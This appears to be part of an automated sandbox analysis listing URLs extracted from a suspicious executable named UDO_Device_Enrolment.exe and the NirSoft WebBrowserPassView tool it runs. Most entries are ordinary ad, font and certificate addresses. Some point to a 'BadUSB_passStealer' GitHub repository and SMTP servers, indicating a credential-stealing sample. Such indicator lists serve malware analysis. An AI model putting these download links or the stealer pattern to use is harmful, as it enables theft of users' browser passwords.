Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0M
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: UDO_Device_Enrolment.exe, 00000000.00000002.336600833.000000001CD02000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.334709433.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocspx.digicert.com0E
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
Source: UDO_Device_Enrolment.exe, 00000000.00000002.333840861.0000000002985000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://raw.githubusercontent.com
Source: UDO_Device_Enrolment.exe, 00000000.00000002.331804384.0000000002546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UDO_Device_Enrolment.exe, 00000000.00000002.334709433.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp-mail.outlook.com
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17milU.img?h=16&w=16&
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xCDZ.img?h=75&w=100
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xMWp.img?h=75&w=100
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: UDO_Device_Enrolment.exe, 00000000.00000002.334709433.0000000002B70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://svc.ha-smtp.live.com
Source: UDO_Device_Enrolment.exe, 00000000.00000003.255083845.000000001D294000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: UDO_Device_Enrolment.exe, 00000000.00000003.256196355.000000001D283000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256283828.000000001D284000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256417856.000000001D286000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256353935.000000001D283000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlH
Source: UDO_Device_Enrolment.exe, 00000000.00000003.256196355.000000001D283000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlNew(
Source: UDO_Device_Enrolment.exe, 00000000.00000003.256196355.000000001D283000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlm
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: UDO_Device_Enrolment.exe, 00000000.00000003.261819152.000000001D291000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.258333810.000000001D289000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.258260679.000000001D28F000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: UDO_Device_Enrolment.exe, 00000000.00000003.257710414.000000001D28F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com(
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: UDO_Device_Enrolment.exe, 00000000.00000003.258326431.000000001D285000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers0
Source: UDO_Device_Enrolment.exe, 00000000.00000003.258326431.000000001D285000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers0.
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: UDO_Device_Enrolment.exe, 00000000.00000003.261819152.000000001D291000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comlic
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.254708391.000000001D285000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.254621546.000000001D285000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: UDO_Device_Enrolment.exe, 00000000.00000003.254874425.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.254816640.000000001D28A000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.254397242.000000001D283000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: UDO_Device_Enrolment.exe, 00000000.00000003.254361071.000000001D28E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.krx
Source: UDO_Device_Enrolment.exe, 00000000.00000003.255985516.000000001D292000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255814500.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255913992.000000001D290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: UDO_Device_Enrolment.exe, 00000000.00000003.255985516.000000001D292000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255814500.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255913992.000000001D290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/(
Source: UDO_Device_Enrolment.exe, 00000000.00000003.255913992.000000001D290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/.TTC
Source: UDO_Device_Enrolment.exe, 00000000.00000003.256055155.000000001D291000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256026004.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255814500.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255913992.000000001D290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/F
Source: UDO_Device_Enrolment.exe, 00000000.00000003.255814500.000000001D290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: UDO_Device_Enrolment.exe, 00000000.00000003.256026004.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255985516.000000001D292000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255913992.000000001D290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: UDO_Device_Enrolment.exe, 00000000.00000003.256055155.000000001D291000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256026004.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256206206.000000001D290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/(
Source: UDO_Device_Enrolment.exe, 00000000.00000003.255985516.000000001D292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/F
Source: UDO_Device_Enrolment.exe, 00000000.00000003.258984273.000000001D2B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.monotype.1
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://www.msn.com
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://www.msn.com/
Source: WebBrowserPassView.exe, 00000001.00000003.280989815.0000000002303000.00000004.00000800.00020000.00000000.sdmp, bhvFCA.tmp.1.dr	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: WebBrowserPassView.exe, 00000001.00000003.280893349.0000000002303000.00000004.00000800.00020000.00000000.sdmp, WebBrowserPassView.exe, 00000001.00000003.280989815.0000000002303000.00000004.00000800.00020000.00000000.sdmp, bhvFCA.tmp.1.dr	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: bhvFCA.tmp.1.dr	String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: WebBrowserPassView.exe, 00000001.00000002.286255097.0000000000193000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: WebBrowserPassView.exe, WebBrowserPassView.exe, 00000001.00000000.266559756.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe, 00000001.00000002.286333427.000000000044F000.00000002.00000001.01000000.00000008.sdmp, WebBrowserPassView.exe.0.dr	String found in binary or memory: http://www.nirsoft.net/
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: UDO_Device_Enrolment.exe, 00000000.00000003.253239011.000000001D292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.comr
Source: UDO_Device_Enrolment.exe, 00000000.00000003.256347561.000000001D2AD000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256221943.000000001D2AC000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.256239233.000000001D2AD000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: UDO_Device_Enrolment.exe, 00000000.00000003.254361071.000000001D28E000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: UDO_Device_Enrolment.exe, 00000000.00000003.253730251.000000001D292000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.253786277.000000001D292000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netF
Source: UDO_Device_Enrolment.exe, 00000000.00000003.257395158.000000001D2AC000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.257364427.000000001D2AC000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.257410399.000000001D2AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.de
Source: UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: UDO_Device_Enrolment.exe, 00000000.00000003.255233873.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.337460286.000000001E482000.00000004.00000800.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255307376.000000001D290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: UDO_Device_Enrolment.exe, 00000000.00000003.255233873.000000001D290000.00000004.00000020.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000003.255307376.000000001D290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cna
Source: UDO_Device_Enrolment.exe, 00000000.00000003.255233873.000000001D290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cncs
Source: WebBrowserPassView.exe, 00000001.00000002.286613090.0000000000C10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: WebBrowserPassView.exe, 00000001.00000003.285907388.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, WebBrowserPassView.exe, 00000001.00000003.280989815.0000000002303000.00000004.00000800.00020000.00000000.sdmp, bhvFCA.tmp.1.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: WebBrowserPassView.exe, 00000001.00000003.280989815.0000000002303000.00000004.00000800.00020000.00000000.sdmp, bhvFCA.tmp.1.dr	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://contextual.media.net/
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: WebBrowserPassView.exe, 00000001.00000003.285907388.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, WebBrowserPassView.exe, 00000001.00000003.281128881.000000000230E000.00000004.00000800.00020000.00000000.sdmp, WebBrowserPassView.exe, 00000001.00000003.281828034.00000000029D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: WebBrowserPassView.exe, 00000001.00000003.285907388.00000000029D3000.00000004.00000800.00020000.00000000.sdmp, WebBrowserPassView.exe, 00000001.00000003.281128881.000000000230E000.00000004.00000800.00020000.00000000.sdmp, WebBrowserPassView.exe, 00000001.00000003.281828034.00000000029D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: UDO_Device_Enrolment.exe, 00000000.00000002.333752118.0000000002932000.00000004.00000800.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.333375877.0000000002880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: UDO_Device_Enrolment.exe, UDO_Device_Enrolment.exe, 00000000.00000002.332722721.0000000002727000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/BrowsingHistoryView.exe
Source: UDO_Device_Enrolment.exe, UDO_Device_Enrolment.exe, 00000000.00000002.332722721.0000000002727000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WNetWatcher.exe?raw=tru
Source: UDO_Device_Enrolment.exe, 00000000.00000002.333375877.0000000002880000.00000004.00000800.00020000.00000000.sdmp, UDO_Device_Enrolment.exe, 00000000.00000002.333296023.0000000002855000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tuconnaisyouknow/BadUSB_passStealer/blob/main/other_files/WebBrowserPassView.exe?
Source: UDO_Device_Enrolment.exe, 00000000.00000002.333752118.0000000002932000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tuconnaisyouknow/BadUSB_passStealer/raw/main/other_files/WebBrowserPassView.exe
Source: UDO_Device_Enrolment.exe, 00000000.00000002.333375877.0000000002880000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.comx
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: bhvFCA.tmp.1.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
